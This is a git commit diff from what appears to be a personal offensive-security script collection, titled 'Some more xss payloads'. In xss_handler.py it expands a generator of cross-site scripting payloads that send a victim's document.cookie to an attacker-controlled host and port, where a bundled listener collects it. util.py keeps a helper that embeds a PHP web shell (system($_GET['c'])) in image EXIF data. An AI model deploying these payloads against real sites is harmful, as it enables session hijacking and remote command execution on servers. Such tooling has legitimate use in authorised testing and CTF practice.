Browse Source

Some more xss payloads

Roman Hergenreder 3 years ago
parent
commit
a086ddeb42
3 changed files with 65 additions and 20 deletions
  1. 40 0
      util.py
  2. 4 16
      web_service_finder.py
  3. 21 4
      xss_handler.py

+ 40 - 0
util.py

@@ -1,9 +1,14 @@
+#!/usr/bin/env python
+
 import random
 import socket
 import netifaces as ni
+import requests
 import sys
 import exif
 import PIL
+import os
+from bs4 import BeautifulSoup
 
 def getAddress(interface="tun0"):
     if not interface in ni.interfaces():
@@ -135,6 +140,22 @@ def exifImage(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_t
     else:
         print("Invalid output argument.")
 
+def collectUrls(input):
+    if not isinstance(input, BeautifulSoup):
+        input = BeautifulSoup(input, "html.parser")
+
+    urls = set()
+    attrs = ["src","href"]
+    tags = ["a","link","script","img"]
+
+    for tag in tags:
+        for e in input.find_all(tag):
+            for attr in attrs:
+                if e.has_attr(attr):
+                    urls.add(e[attr])
+
+    return urls
+
 if __name__ == "__main__":
     bin = sys.argv[0]
     if len(sys.argv) < 2:
@@ -172,3 +193,22 @@ if __name__ == "__main__":
                 _out = ".".join(_out[0:-1]) + "_exif." + _out[-1]
 
             exifImage(payload, _in, _out, tag)
+    elif command == "collectUrls":
+        if len(sys.argv) < 3:
+            print("Usage: %s collectUrls <url/file>" % bin)
+        else:
+            uri = sys.argv[2]
+            if os.path.isfile(uri):
+                data = open(uri,"r").read()
+            else:
+                res = requests.get(uri)
+                if res.status_code != 200:
+                    print("%s returned: %d %s" % (uri, res.status_code, res.reason))
+                    exit()
+                data = res.text
+            for item in sorted(collectUrls(data)):
+                print(item)
+    elif command == "help":
+        print("Usage: %s [command]" % bin)
+        print("Available commands:")
+        print("   help, getAddress, pad, collectUrls, exifImage")

+ 4 - 16
web_service_finder.py

@@ -5,6 +5,7 @@ import sys
 import argparse
 import requests
 import urllib.parse
+from hackingscripts import util
 from bs4 import BeautifulSoup
 
 class WebServicecFinder:
@@ -108,19 +109,6 @@ class WebServicecFinder:
             return True
         return False
 
-    def collectUrls(self, soup):
-        urls = set()
-        attrs = ["src","href"]
-        tags = ["a","link","script","img"]
-
-        for tag in tags:
-            for e in soup.find_all(tag):
-                for attr in attrs:
-                    if e.has_attr(attr):
-                        urls.add(e[attr])
-
-        return urls
-
     def retrieveMoodleVersion(self, v):
         res = requests.get("https://docs.moodle.org/dev/Releases")
         soup = BeautifulSoup(res.text, "html.parser")
@@ -158,9 +146,9 @@ class WebServicecFinder:
         moodle_pattern_1 = re.compile(r"^https://download.moodle.org/mobile\?version=(\d+)(&|$)")
         moodle_pattern_2 = re.compile(r"^https://docs.moodle.org/(\d+)/")
         litecart_pattern = re.compile(r"^https://www.litecart.net")
-        wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|block-library/style.min.css)\?ver=([0-9.]+)(&|$)")
+        wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
 
-        urls = self.collectUrls(soup)
+        urls = util.collectUrls(soup)
         for url in urls:
             self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
             self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))
@@ -170,7 +158,7 @@ class WebServicecFinder:
 
     def analyseRobots(self):
         res = self.do_get("/robots.txt", allow_redirects=False)
-        if res.status_code in (301,302,404,403):
+        if res.status_code != 200:
             print("[-] robots.txt not found or inaccessible")
             return False
 

+ 21 - 4
xss_handler.py

@@ -6,12 +6,29 @@ import http.server
 import socketserver
 from http.server import HTTPServer, BaseHTTPRequestHandler
 
-def generatePayload(type, address, port):
-    if type == "img":
-        return '<img src="#" onerror="javascript:document.location=\'http://%s:%d/?x=\'+document.cookie">' % (address, port)
+def getCookieAddress(address, port):
+    if port == 80:
+        return "'http://%s/?x='+document.cookie" % address
     else:
+        return "'http://%s:%d/?x='+document.cookie" % (address, port)
+
+def generatePayload(type, address, port):
+
+    payloads = []
+    cookieAddress = getCookieAddress(address, port)
+
+    media_tags = ["img","audio","video","image","body","script","object"]
+    if type in media_tags:
+        payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress))
+
+    if type == "script":
+        payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
+
+    if len(payloads) == 0:
         return None
 
+    return "\n".join(payloads)
+
 class XssServer(BaseHTTPRequestHandler):
     def _set_headers(self):
         self.send_response(200)
@@ -54,7 +71,7 @@ if __name__ == "__main__":
 
     payload = generatePayload(payload_type, local_address, listen_port)
     if not payload:
-        print("Unsupported payload type, choose one of: img")
+        print("Unsupported payload type")
         exit(1)
 
     print("Payload:")